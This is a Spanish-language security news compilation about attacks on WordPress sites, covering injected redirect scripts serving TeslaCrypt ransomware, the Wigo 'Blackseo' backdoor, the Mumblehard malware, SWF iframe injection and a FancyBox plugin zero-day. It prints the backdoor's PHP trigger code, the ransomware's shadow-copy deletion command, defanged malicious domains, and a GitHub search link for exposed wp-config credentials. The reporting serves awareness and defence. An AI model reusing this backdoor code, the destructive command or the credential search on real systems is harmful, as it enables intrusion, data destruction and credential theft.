Cientos de millones de sitios web legítimos podrían servir ransomware gracias a Inyección de Script

Heimdal Security publicó un interesante post sobre el aumento de scripts maliciosos que están siendo inyectado en sitios web legítimos con el fin de servir ransomware.


Heimdal Security publicó recientemente un blog interesante sobre el aumento de los scripts maliciosos que están siendo inyectado en sitios web legítimos con el fin de servir malware. Los atacantes comprometen sitios web que ejecutan un sistema de gestión de contenido obsoleto (CMS) y despliegan el popular Neutrino exploit kit.

Las estadísticas confirman que los ladrones comprometen principalmente sitios web de WordPress, En agosto, expertos de la empresa de seguridad Zscaler descubrieron una campaña de malware que se basa en miles de sitios de WordPress secuestrados que alojan el Neutrino Exploit Kit.

De acuerdo con la estática proporcionadas por w3techs.com

"WordPress es utilizado por el 58,8% de todos los sitios web de quien conocemos su sistema de gestión de contenido. Este es el 24,4% de todos los sitios web ".

Esto significa, que aproximadamente mil millones de sitios web legítimos son vulnerables a este tipo de ataques, si profundizamos dividiendo los sitios web de WordPress por versiones tendremos las siguientes situaciones:



Tomando en cuenta, que incluso los casos de WordPress ejecutan plugins desactualizados o con la configuración de seguridad pobre podría ser potencialmente comprometido.

Se trata de un gran número, se ha estimado que 409 millones de personas leen Blogs de WordPress por mes, y de esos, 142 millones de sitios web de fiar pueden ser explotada.

El análisis realizado por Heimdal concluye que el script malicioso se inyecta en las referencias de sitios web ", preparado para el dominio: [.] Thedancingbutterfly Com.
Entonces el dominio thedancingbutterfly.com redirige el tráfico a un Neutrino exploit kit y trata de ofrecer a la PC de la víctima el ransomware Teslacrypt.

Neutrino tratará de explotar vulnerabilidades del reproductor Adobe Flash/Internet Explorer/Acrobat con el fin de comprometer la máquina y descargar payloads más maliciosos.

Todas las vulnerabilidades tienen tasas de detección bajas (en Virustotal), e incluso el dominio utilizado para la inyección de secuencia de comandos para redirigir las víctimas, "[.] Nkzppqzzzumhoap Ml" no tiene una buena tasa de detección:


"El dominio se entrega a través de su propio servidor de nombres ns1 y raíz, y está alojada en Holanda por OpenTLD BV. El mismo servidor contiene otros dominios tóxicos utilizados en ataques que emplean el Neutrino Exploit Kit. ", Señala el mensaje.

Teslacrypt tiene también una tasa dection baja, actual siendo 10/56. Sobre el Teslacrypt, sabemos que encripta muchas extensiones (normalmente los más importantes), las versiones recientes también se dirigen a los datos de juego.

Después de la encriptación de los archivos de los usuarios, la Teslacrypt deja en cada carpeta algo como:

restore_files_ [4 letras al azar] .txt
restore_files_ [4 letras al azar] .html

Los archivos, por supuesto, contienen la información sobre cómo comprar la clave de descifrado.

Teslacrypt también eliminará el shadow en la unidad local mediante el comando:

"C:\WINDOWS\system32\Vssadmin.exe" delete shadows /all /quiet "

Teslacrypt se inyectará a sí mismo en el proceso "iexplore.exe" y "cmd.exe".

Este ransomware también "llama a un amigo", un ladrón de información perteneciente a la familia Pony con el dominio "light-tech [.] Pl."

Si eres dueño de un sitio web o administrador siempre ten en cuenta la importancia de actualizar y parchar, esta es la única manera de evitar problemas para ti y los millones de usuarios de Internet.

Wigo Significa Bingo para Blackseo Agent


La firma de seguridad Sucuri ha identificado sitios infectados con un código muy similar incrustado en los archivos index.php de WordPress:
if (eregi ('-dbst', $ _ SERVER ['REQUEST_URI'])) {
error_reporting (0);
include ('license.txt');
exit();
}
El código es muy simple. Comprueba si una página tiene anexado "-dbst" a la URL y ejecuta un código de un archivo incluido. A primera vista, parecía un código de una puerta trasera que se activa si los hackers utilizan URLs especiales con el código de acceso "-dbst".

En algunos casos, el archivo incluido es license.txt en otros casos readme.html. Ambos archivos son una parte del núcleo de WordPress y se espera que se encuentran en el directorio raíz. Sin embargo, como era de esperar, contienen un código ofuscado.

Condiciones Wigo

Después de una deofuscacion, se localiza el código de puerta trasera:


Además de tener "-dbst" en la URL, también requiere el user agent "Blackseo Agent v0.1", o bien parámetros GET PHP4 o PHP5. En caso de php4, se crea un formulario de carga de archivos, en el caso de php5, se descarga un archivo remoto a un servidor comprometido. En cualquier caso, la puerta trasera incluye la etiqueta distintiva "Wigo", que ayuda a verificar que la puerta trasera está ahí.
Pero como el user agent "Blackseo Agent v0.1" indica, no es sólo una puerta trasera. El código también tiene una parte más grande que crea puertas de spam utilizando datos de hxxp: // apollo5go. com / api.php? action = get_link y api_key = ... y adultwww .apollo2gen .com. Las puertas tienen un script para redirigir a los visitantes a hxxp: // www .hqnuvideoz .com / out.php id = traffic-shop.com, luego a hxxp: // www .us-xxx .com / tr.php Identificación? = hqnuvideoz.com, y otros sitios de pornografía.

Encontrando el patrón

Dada esta información, revisando en Google páginas que contenían "-dbst" en sus URLs. La consulta [inurl: "dbst" xxx] devuelve algunos resultados prometedores con URLs como: best-playboy-photo-ever-dbst.html. Para averiguar si era el mismo ataque que se había investigado, los investigadores abrieron las páginas utilizando el user agent "Blackseo Agent v0.1". Como era de esperar, la mayoría de las direcciones URL devuelven esto:

Wigo%

¡Bingo!

Comprobando con busquedas como [site: hacked-site.com inurl: "dbst"] revelaron que este ataque crea al rededor de 1000 a 40.000 páginas de entrada de spam en los sitios comprometidos.

Mas de 150,000,000 credenciales de bases de datos en GitHub


A través de una búsqueda en la pagina de código social GitHub, sobre el archivo wp-config.php de Wordpress, se pueden localizar mas de 150,000,000 de credenciales.

Puedes comprobarlo visitando el enlace:

https://github.com/search?utf8=%E2%9C%93&q=filename%3Awp-config.php+&type=Code&ref=searchresults

Esperamos que no se encuentren las tuyas ahí...

Mumblehard: Contagio a Wordpress convierte servidores Linux en robots de spam

El malware Mumblehard está convirtiendo servidores Linux y BSD en zombies repartidores de spam
Imagen: Mashable
Los investigadores de seguridad de ESET han registrado más de 8.500 direcciones IP únicas durante un periodo de investigación de siete meses centrados en amenaza de malware ligado al correo spam.

Mumblehard se compone de dos componentes diferentes. El primer componente es un backdoor genérico que solicita comandos de su servidor de comando y control. El segundo componente es un proceso "con todas las funciones de demonio (daemon) spammer", que se pone en marcha a través de una orden recibida a través de la puerta trasera.
El malware  explota vulnerabilidadesel en Joomla (el sistema de gestión de contenidos) y WordPress (la muy hackeada plataforma CMS para blogging), como se explica con mayor profundidad en un blog por ESET.

Mumblehard también se distribuye a través de copias "piratas" de un programa de Linux y BSD conocido como DirectMailer, software desarrollado por anuncio publicitario Yellsoft y vendidos a través de la página web de la empresa rusa en $240. "Nuestra investigación mostró fuertes vínculos con una empresa de software llamada Yellsoft", explicó el investigador de malware de ESET Marc-Etienne M.Léveillé.

"Entre otros descubrimientos, encontramos que las direcciones IP no modificables en el malware están estrechamente vinculados a los de Yellsoft", explicó Léveillé.

The Register contacto a Yellsoft para hacer comentarios a través de Twitter (desde su dirección yellsoft.net no resuelve). No se ha recibido respuesta por parte de la compañia.

El artículo de ESET que trata a profundidad la investigación técnica, titulado Unboxing Linux / Mumblehard - Murmulladora de spam para tus servidores se puede encontrar aquí (pdf).

Los ataques de este tipo están lejos de ser aislados. Por ejemplo, el malware llamado Mayheim fue capturado difundiendose a través de servidores web Linux y FreeBSD en Rusia y en otros lugares el pasado julio. El crimeware se propaga por plug-ins no actualizados de las plataformas de blogs.

Archivos SWF (Flash) Inyectando iFrames maliciosos en sitios WordPress y Joomla

Los investigadores han visto últimamente el uso de archivos de Adobe Flash SWF utilizándose para inyectar iFrames maliciosos a través de sitios web.

Fuente: ThreatPost
Varios cientos de sitios web de WordPress y Joomla han sido barridos en la campaña, observada por primera vez por los investigadores de la empresa Sucuri en noviembre pasado.

"Aunque se desconoce cuantas variaciones había al momento de reportar por primera vez el caso, esta vez hemos encontrado una gran cantidad de sitios web donde la infección es similar,"
 escribió Peter Gramantik, un investigador de malware senior de la firma, este jueves.
Según Gramantik la infección está claramente marcada por un archivo SWF con tres caracteres aleatorios como nombre que se almacenan en la carpeta de imagenes/banners de un sitio. En cuanto a la firma ha visto, cada archivo tiene un parámetro de ID hash aleatorio unido al extremo del mismo.

Mientras que los nombres de variables del malware, la lógica de codificación y UserAgent siguen siendo los mismos, una de las principales diferencias con respecto a la versión de la campaña del noviembre es que esta encarnación se ha extendido a través de sitios Joomla y WordPress. Como es de esperar, el sitio web que entrega el código malicioso ha cambiado también.

Los archivos SWF, también conocidos como archivos de formato pequeño web, inyectan un iFrame invisible, que puede entregar algunos otros tipos de amenaza.

Vulnerabilidad Dia-Cero (0-day) en Plugin de WordPress


Una vulnerabilidad día cero se ha descubierto en un plugin de WordPress popular, llamado 'FancyBox para WordPress', que está siendo utilizado por cientos de miles de sitios web que se ejecutan la plataforma más popular plataforma de blogs: Wordpress.

Vulnerabilidades Dia Cero Utilizadas en Internet

Los investigadores de seguridad de la firma Sucuri emitieron una advertencia ayer miercoles por la vulnerabilidad de día cero que se está "activamente explotando en internet" por hackers maliciosos para infectar el mayor número de víctimas.
Si bien hay más de 70 millones de sitios web en Internet actualmente ejecutan el sistema de gestión de contenidos WordPress, más de medio millón de sitios web utilizan el plugin 'FancyBox for WordPress', por lo que es uno de los plugins más populares de Wordpress para la visualización de imágenes, el contenido HTML y multimedia en la llamada "lightbox" que flota sobre la página Web.

Los Hackers Inyectan Malware en Wordpress

La vulnerabilidad permite a los atacantes inyectar un iframe malicioso (o cualquier script / contenido aleatorio) en los sitios web vulnerables que por lo general redirecciona las víctimas al sitio web '203koko'.

"Todas las infecciones tenían un iframe malicioso similar de '203koko' inyectado en el sitio web,"

Daniel Cid, fundador y director de tecnología de Sucuri que descubrió la vulnerabilidad, escribió en un aviso.

"En el análisis de los sitios web infectados, se encontró que todos los sitios web estaban usando el plugin FancyBox para WordPress."

FancyBox for WordPress Plugin ya ha sido retirado temporalmente del Directorio de plugins de WordPress, y los investigadores aconsejaron a usuarios/desarrolladores/programadores de wordpress que eliminaran el plug-in, ya que no ha sido actualizado desde hace dos años y constituye una amenaza para la seguridad de los usuarios.

Se libera Parche

Sin perder mucho tiempo, los desarrolladores lanzaron dos nuevas versiones del plugin hoy jueves para solucionar la falla. La versión 3.0.3 aborda la falla real, mientras que la versión 3.0.4, lanzada hoy por la tarde por José Pardilla, cambia el nombre del plug-in de configuración donde se originó el problema.
De acuerdo con el registro de cambios plugin, las últimas actualizaciones dejarán de ejecutar el código malicioso en las páginas web donde el plugin se actualiza sin eliminarlo. Los usuarios que tienen el plugin FancyBox for WordPress instalado en sus sitios se les recomienda aplicar el parche de inmediato.
WordPress es una herramienta de blogs de código abierto y un sistema de gestión de contenidos (CMS), con más de 30.000 plugins, cada uno de los cuales ofrece funciones personalizadas y cuenta permite a los usuarios adaptar sus sitios web a sus necesidades específicas. Es fácil de configurar y usar, y es por eso que decenas de millones de sitios web en todo el mundo opta por ella, y por lo tanto, los sitios de WordPress son un blanco favorito de los piratas informáticos.

Fuente: Sucuri
Siguenos:
¿Usas Feedly? Suscribete:
follow us in feedly
Anuncios
Lo Más Popular